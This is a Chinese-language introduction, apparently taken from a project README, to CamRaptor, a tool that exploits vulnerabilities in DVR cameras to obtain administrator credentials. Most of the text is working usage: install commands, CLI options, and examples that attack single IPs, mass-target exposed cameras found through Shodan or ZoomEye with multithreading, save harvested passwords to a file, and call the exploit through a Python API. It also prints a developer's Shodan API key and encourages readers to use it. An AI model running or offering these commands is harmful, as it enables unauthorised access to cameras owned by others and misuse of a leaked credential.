关于CamRaptor
CamRaptor是一款针对DVR摄像头的漏洞利用工具,它可以利用当前主流DVR摄像头中的多个安全漏洞,帮助广大研究人员获取目标DVR网络摄像头的管理员凭证。
功能介绍
能够利用当前主流DVR摄像头中的多个安全漏洞,例如Novo、CeNova和QSee等。
经过优化处理,支持以多线程的形式同时攻击列表中的多个目标DVR摄像头。
简单的命令行接口和API使用方法。
工具安装
由于CamRaptor使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广大研究人员可以使用下列命令下载并安装CamRaptor:
代码语言:javascript复制pip3 install git https://github.com/EntySec/CamRaptor工具基础使用CamRaptor的使用非常简单,我们只需要在命令行终端中输入“camraptor”命令即可使用CamRaptor:
代码语言:javascript复制usage: camraptor [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]
[--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]
CamRaptor is a tool that exploits several vulnerabilities in popular DVR
cameras to obtain network camera credentials.
optional arguments:
-h, --help 显示这个帮助信息并退出
-t, --threads 启用多线程模式以获得更好的性能
-o OUTPUT, --output OUTPUT
将结果存储至文件
-i INPUT, --input INPUT
地址输入文件
-a ADDRESS, --address ADDRESS
提供单个地址
--shodan SHODAN 通过网络利用远程设备所使用的Shodan API密钥
--zoomeye ZOOMEYE 通过网络利用远程设备所使用的ZoomEye API密钥
-p PAGES, --pages PAGES
需要通过ZoomEye获取的页面数量工具使用样例
攻击单个摄像头
下列命令可以攻击单个DVR摄像头:
代码语言:javascript复制camraptor -a 192.168.99.100通过网络攻击远程DVR摄像头接下来,我们可以使用Shodan搜索引擎来搜索并攻击网络上的摄像头,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:
代码语言:javascript复制camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD注意:项目中给出的Shodan API密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是开发人员自己的专业版API密钥,你可以使用你自己的密钥,当然了你想用开发人员的也没意见,大家资源共享嘛!
从输入文件获取目标摄像头
我们还可以使用开放数据库中提供的摄像头地址,此时我们可以使用-t参数来设置多线程数量以获得更好的性能:
代码语言:javascript复制camraptor -t -i cameras.txt -o passwords.txt注意:此命令将会攻击cameras.txt中给出的所有摄像头,并会将所有获取到的密码存储至passwords.txt文件中。
API使用
CamRaptor还提供了自己的Python API,可以将其导入至你们自己的项目代码中并调用其功能:
代码语言:javascript复制from camraptor import CamRaptor基础函数
exploit(address):根据给定的地址针对单个目标执行漏洞利用攻击;
调用样例
攻击单个摄像头:
代码语言:javascript复制from camraptor import CamRaptor
camraptor = CamRaptor()
creds = camraptor.exploit('192.168.99.100')
print(creds)项目地址
CamRaptor:https://github.com/EntySec/CamRaptor
